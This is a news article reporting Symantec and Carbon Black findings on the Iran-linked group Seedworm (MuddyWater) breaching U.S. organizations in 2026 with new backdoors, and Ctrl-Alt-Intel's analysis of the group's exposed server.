Iran-Linked Hacking Group Targets U.S. Organizations Amid Rising Geopolitical Tensions
An Iranian hacking group known to be linked to various state-sponsored cyber espionage activities has re-emerged, actively infiltrating several U.S. organizations as of early February 2026. The alarming increase in cyber activities has raised red flags for cybersecurity experts and government officials alike, indicating that this increase may precede broader cyber operations amidst escalating geopolitical tensions in the Middle East.
Emergence of New Malware Backdoors
The cybersecurity firms Symantec and Carbon Black have attributed the recent cyber intrusions to a group commonly referred to as Seedworm, also known by the moniker MuddyWater. This advanced persistent threat (APT) has historical ties to Iran’s Ministry of Intelligence and Security (MOIS). The group is notorious for carrying out espionage campaigns that target government agencies, telecommunications firms, and other critical infrastructures around the world.
Recent investigations by cybersecurity researchers have revealed that the suspicious activities tied to Seedworm have been detected within the networks of various significant U.S. entities, including:
- A major U.S. bank
- A prominent U.S. airport
- Multiple non-profit organizations
- Operations of an American software company based in Israel that provides services to the defense and aerospace sectors
The malicious activities attributed to Seedworm began in early February 2026 and have persisted into recent days. Researchers have observed the group deploying previously unknown malware variants, which are specifically designed to penetrate network defenses.
Two such backdoors have drawn significant attention:
-
Dindoor: This backdoor utilizes Deno, a runtime environment primarily for JavaScript and TypeScript, enabling attackers to execute commands on compromised machines.
- Fakeset: A Python-based backdoor that has also been linked to Seedworm.
Researchers noted that Dindoor was digitally signed with a certificate belonging to an individual named "Amy Cherne," while Fakeset carried signatures linked to both "Cherne" and "Donald Gay." The latter has been tied to the Stagecomp and Darkcomp malware, further accentuating the implications of this cyber invasion.
The primary objective of the infiltration appears to be espionage. Attackers have been seen attempting to exfiltrate sensitive data from the targeted software company into a cloud storage bucket hosted by Wasabi, employing the open-source tool Rclone.
According to the cybersecurity analysts, "While it’s not known if Seedworm’s operations are impacted by the ongoing conflicts, having already embedded themselves within U.S. and Israeli networks prior to current hostilities places the group in a precarious position to launch more aggressive cyber-attacks."
As investigations continue, it remains unclear what specific methods or exploits Seedworm employed to gain initial access to these organizations’ networks, posing a challenging question for cybersecurity defenders.
Insights from Exposed VPS
In a related development, the independent threat intelligence research collective Ctrl-Alt-Intel disclosed that it successfully accessed infrastructure utilized by Seedworm, allowing them to gather comprehensive data that includes command-and-control (C2) tooling, operational scripts, logs, victim data, and other artifacts from a Virtual Private Server (VPS) located in the Netherlands.
Following their analysis, the researchers identified a broader spectrum of organizations targeted by Seedworm, including various sectors from Israeli healthcare to governmental bodies in Jordan and Egypt. Additionally, the group has reportedly set its sights on private companies across the United Arab Emirates, as well as American entities and NGOs associated with Jewish and Israeli interests.
The disclosed operational details painted a striking picture of Seedworm’s capabilities. "The exposed infrastructure provides a sweeping view of a MuddyWater operation—from initial reconnaissance to data exfiltration," noted Ctrl-Alt-Intel. "What stands out is not just the sophistication of individual tools but the extensive array of operations targeting numerous organizations."
The analysis indicated that Seedworm has exploited over a dozen Common Vulnerabilities and Exposures (CVEs), including new SQL injection vulnerabilities and conducted password-spraying campaigns. They have even incorporated Ethereum-based C2 resolution into their tactics, developing multiple pathways for data exfiltration through cloud storage and Amazon EC2 instances.
“MuddyWater exhibits a notable ability to quickly integrate public exploit code, tailor it for operational use, and scale its deployment, all while concurrently developing custom tools tailored for their operations,” the group concluded.
As cybersecurity experts remain vigilant, this ongoing threat illustrates the complex landscape of cyber warfare and espionage linked to geopolitical conflicts. As the situation evolves, both U.S. and Israeli organizations must strengthen their cyber defenses to safeguard against these sophisticated operations.